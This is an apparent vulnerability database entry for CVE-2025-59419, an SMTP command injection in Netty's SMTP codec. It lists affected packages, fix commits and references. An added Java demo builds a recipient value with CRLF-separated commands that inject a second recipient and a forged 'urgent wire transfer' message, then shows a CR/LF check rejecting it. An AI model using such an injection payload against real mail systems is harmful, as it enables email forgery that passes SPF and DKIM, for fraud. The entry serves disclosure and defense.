CVE-2025-59419
Description
Netty is an asynchronous, event-driven network application framework. In versions prior to 4.1.128.Final and 4.2.7.Final, the SMTP codec (netty-codec-smtp) contains an SMTP command injection vulnerability caused by missing validation of carriage return (\r) and line feed (\n) characters in caller-supplied parameters. The defect is in io.netty.handler.codec.smtp.DefaultSmtpRequest, where parameters are concatenated directly into the SMTP command line without sanitization. When a method such as SmtpRequests.rcpt(recipient) is called with a string containing CRLF sequences, everything after the first CRLF is written to the wire as additional lines, and the receiving server treats each line as a separate SMTP command. An attacker who controls such a parameter, for example a recipient address taken from a web form, can therefore inject arbitrary commands, including a further RCPT TO and a DATA section carrying a forged message. Because the injected commands leave from the application's own mail host, the resulting messages will typically pass SPF (the connecting IP is one the domain authorizes) and will also pass DKIM when the outbound relay signs mail for that domain, so they appear legitimate to receivers. This lets remote attackers who can control SMTP command parameters forge arbitrary emails from the trusted server, for example impersonating executives in high-stakes corporate communications. The GitHub Security Advisory records the fixed releases as 4.1.128.Final and 4.2.7.Final (see the package table below); the CVE description text names 4.1.129.Final and 4.2.8.Final, so upgrading to at least those later releases satisfies both statements. No workaround is listed in the advisory; rejecting CR and LF in every caller-supplied value before it reaches the codec removes the injection path as defense in depth, but it is not a substitute for upgrading.
Affected packages
Versions sourced from the GitHub Security Advisory.
| Package | Affected versions | Patched versions |
|---|---|---|
| io.netty:netty-codec-smtp (Maven) | >= 4.2.0.Alpha1, < 4.2.7.Final | 4.2.7.Final |
| io.netty:netty-codec-smtp (Maven) | < 4.1.128.Final | 4.1.128.Final |
Affected products
185 product entries are recorded from OSV coordination; none of them has a CPE. Each range gives the affected versions of that package, and its upper bound is the first fixed build. Packages that share a range are grouped on one row.

| Ecosystem | Package(s) | Affected range |
|---|---|---|
| Chainguard (apk) | pkg:apk/chainguard/apache-hop | < 2.15.0-r13 |
| Chainguard (apk) | pkg:apk/chainguard/apache-hop-fips | < 2.15.0-r15 |
| Chainguard (apk) | pkg:apk/chainguard/celeborn-0.5, celeborn-0.5-compat | < 0.5.4-r8 |
| Chainguard (apk) | pkg:apk/chainguard/celeborn-0.6 | < 0.6.3-r7 |
| Chainguard (apk) | pkg:apk/chainguard/hadoop-fips-3.3.6, hadoop-fips-3.3.6-compat, hadoop-fips-3.3.6-dev, hadoop-fips-3.3.6-m2 | < 3.3.6-r13 |
| Chainguard (apk) | pkg:apk/chainguard/management-api-for-apache-cassandra-4.0, management-api-for-apache-cassandra-4.0-compat, management-api-for-apache-cassandra-4.1, management-api-for-apache-cassandra-4.1-compat | < 0.1.108-r1 |
| Chainguard (apk) | pkg:apk/chainguard/management-api-for-apache-cassandra-5.0, management-api-for-apache-cassandra-5.0-compat | < 0.1.108-r2 |
| Chainguard (apk) | pkg:apk/chainguard/pinot-fips | < 1.5.0-r9 |
| Chainguard (apk) | pkg:apk/chainguard/seata, seata-namingserver, seata-namingserver-oci-entrypoint, seata-openjdk-17-compat, seata-openjdk-21-compat, seata-openjdk-8-compat, seata-server, seata-server-oci-entrypoint | < 2.5.0-r1 |
| Chainguard (apk) | pkg:apk/chainguard/tez | < 0.10.5-r6 |
| Chainguard (apk) | pkg:apk/chainguard/thingsboard, thingsboard-tb-js-executor, thingsboard-tb-mqtt-transport, thingsboard-tb-node, thingsboard-tb-web-ui | < 4.2.1-r1 |
| Chainguard (apk) | pkg:apk/chainguard/trino, trino-config, trino-oci-entrypoint and the 64 trino-plugin-* packages: accumulo, ai-functions, atop, bigquery, blackhole, cassandra, clickhouse, delta-lake, druid, duckdb, elasticsearch, example-http, exasol, exchange-filesystem, exchange-hdfs, faker, functions-python, geospatial, google-sheets, hive, http-event-listener, http-server-event-listener, hudi, iceberg, ignite, jmx, kafka, kafka-event-listener, kinesis, kudu, lakehouse, ldap-group-provider, local-file, loki, mariadb, memory, ml, mongodb, mysql, mysql-event-listener, opa, openlineage, opensearch, oracle, password-authenticators, phoenix5, pinot, postgresql, prometheus, ranger, raptor-legacy, redis, redshift, resource-group-managers, session-property-managers, singlestore, snowflake, spooling-filesystem, sqlserver, teradata-functions, thrift, tpcds, tpch, vertica | < 477-r2 |
| Wolfi (apk) | pkg:apk/wolfi/celeborn-0.5, celeborn-0.5-compat | < 0.5.4-r8 |
| Wolfi (apk) | pkg:apk/wolfi/celeborn-0.6 | < 0.6.3-r7 |
| Wolfi (apk) | pkg:apk/wolfi/management-api-for-apache-cassandra-4.1, management-api-for-apache-cassandra-4.1-compat | < 0.1.108-r1 |
| Wolfi (apk) | pkg:apk/wolfi/management-api-for-apache-cassandra-5.0, management-api-for-apache-cassandra-5.0-compat | < 0.1.108-r2 |
| Wolfi (apk) | pkg:apk/wolfi/tez | < 0.10.5-r6 |
| Wolfi (apk) | pkg:apk/wolfi/thingsboard, thingsboard-tb-js-executor, thingsboard-tb-mqtt-transport, thingsboard-tb-node, thingsboard-tb-web-ui | < 4.2.1-r1 |
| Wolfi (apk) | pkg:apk/wolfi/trino, trino-config, trino-oci-entrypoint and the same 64 trino-plugin-* packages as the Chainguard row | < 477-r2 |
| Maven | pkg:maven/io.netty/netty-codec-smtp (the 4.1 branch range is in the Affected packages table above) | >= 4.2.0.Alpha1, < 4.2.7.Final |
| openSUSE (rpm) | pkg:rpm/opensuse/netty (openSUSE Leap 15.6) | < 4.1.128-150200.4.37.1 |
| openSUSE (rpm) | pkg:rpm/opensuse/netty (openSUSE Tumbleweed) | < 4.1.128-1.1 |
| openSUSE (rpm) | pkg:rpm/opensuse/netty-tcnative (openSUSE Leap 15.6) | < 2.0.74-150200.3.33.1 |
| SUSE (rpm) | pkg:rpm/suse/netty (SUSE Linux Enterprise Module for Package Hub 15 SP6 and SP7) | < 4.1.128-150200.4.37.1 |
| SUSE (rpm) | pkg:rpm/suse/netty-tcnative (SUSE Linux Enterprise Module for Development Tools 15 SP6 and SP7) | < 2.0.74-150200.3.33.1 |
Patches
Fix commits referenced by the advisory and NVD: github.com/netty/netty/commit/1782e8c2060a244c4d4e6f9d9112d5517ca05120 and github.com/netty/netty/commit/2b3fddd3339cde1601f622b9ce5e54c39f24c3f9. The GitHub Security Advisory lists the fixed releases of netty-codec-smtp as 4.1.128.Final and 4.2.7.Final.
Vulnerability mechanics
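The injection described above, as an added example that is not Netty's code and not part of the original advisory: a minimal encoder that concatenates a parameter into the command line the way the description says DefaultSmtpRequest does, a constructed recipient value carrying CRLF-separated commands, the line-by-line view a receiving server would get, and the CR/LF check that closes the hole. The class name, method names and the sample payload are assumptions made for this demo; only SmtpRequests.rcpt and DefaultSmtpRequest are names from the advisory.

```java
import java.util.ArrayList;
import java.util.List;

/*
 * Added illustration for CVE-2025-59419. This is NOT Netty's code. It models
 * the pattern the advisory describes (a caller-supplied parameter placed
 * straight into an SMTP command line), shows what the server parses out of
 * the resulting bytes, and then applies the check that rejects CR and LF.
 * The recipient payload is constructed for the demo.
 */
public final class SmtpCrlfInjectionDemo {

    /** Pre-fix pattern: the parameter goes into the command line unchecked. */
    static String encodeUnchecked(String command, String parameter) {
        return command + ":<" + parameter + ">\r\n";
    }

    /** True if a value would break out of a single SMTP line. */
    static boolean containsCrLf(CharSequence value) {
        for (int i = 0; i < value.length(); i++) {
            char c = value.charAt(i);
            if (c == '\r' || c == '\n') {
                return true;
            }
        }
        return false;
    }

    /** Hardened pattern: refuse any parameter containing CR or LF. */
    static String encodeChecked(String command, String parameter) {
        if (containsCrLf(parameter)) {
            throw new IllegalArgumentException(
                command + " parameter contains CR or LF");
        }
        return command + ":<" + parameter + ">\r\n";
    }

    /** A server reads the stream line by line; every CRLF ends a command. */
    static List<String> serverView(String wire) {
        List<String> lines = new ArrayList<>();
        for (String line : wire.split("\r\n", -1)) {
            if (!line.isEmpty()) {
                lines.add(line);
            }
        }
        return lines;
    }

    public static void main(String[] args) {
        // Constructed attacker-controlled recipient: a valid address followed by
        // CRLF-separated commands that add a second recipient and a forged body.
        String recipient = "victim@example.com>\r\n"
            + "RCPT TO:<cfo@example.com>\r\n"
            + "DATA\r\n"
            + "From: CEO <ceo@example.com>\r\n"
            + "To: cfo@example.com\r\n"
            + "Subject: Urgent wire transfer\r\n"
            + "\r\n"
            + "Please release the payment today.\r\n"
            + ".\r\n"
            + "NOOP ";   // absorbs the closing '>' the template appends

        String wire = encodeUnchecked("RCPT TO", recipient);
        System.out.println("Unchecked encoder, as the server parses it:");
        for (String line : serverView(wire)) {
            System.out.println("  C: " + line);
        }

        try {
            encodeChecked("RCPT TO", recipient);
        } catch (IllegalArgumentException e) {
            System.out.println("Checked encoder rejected input: " + e.getMessage());
        }
    }
}
```

Compile and run with javac and java. The first block of output shows a single RCPT TO call unfolding into a second recipient, a DATA command and a complete forged message terminated by the lone dot, which is why an attacker who controls only the recipient field can send mail that leaves from the trusted host and passes the sender domain's SPF (and DKIM, if the relay signs). Until a fixed netty-codec-smtp is deployed, running containsCrLf over every caller-supplied value before it reaches SmtpRequests.rcpt or a DefaultSmtpRequest constructor removes this injection path at the application boundary; it is defense in depth, not a replacement for the upgrade.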
References
Source and reference type are shown in parentheses.
- github.com/advisories/GHSA-jq43-27x9-3v86 (ghsa, ADVISORY)
- nvd.nist.gov/vuln/detail/CVE-2025-59419 (ghsa, ADVISORY)
- gist.github.com/DepthFirstDisclosures/ddacca28cb94b48fa8ab998cef59ed8c (ghsa, WEB)
- github.com/netty/netty/commit/1782e8c2060a244c4d4e6f9d9112d5517ca05120 (nvd, WEB)
- github.com/netty/netty/commit/2b3fddd3339cde1601f622b9ce5e54c39f24c3f9 (ghsa, WEB)
- github.com/netty/netty/security/advisories/GHSA-jq43-27x9-3v86 (nvd, WEB)
- www.depthfirst.com/post/our-ai-agent-found-a-netty-zero-day-that-bypasses-email-authentication-the-story-of-cve-2025-59419 (nvd, WEB)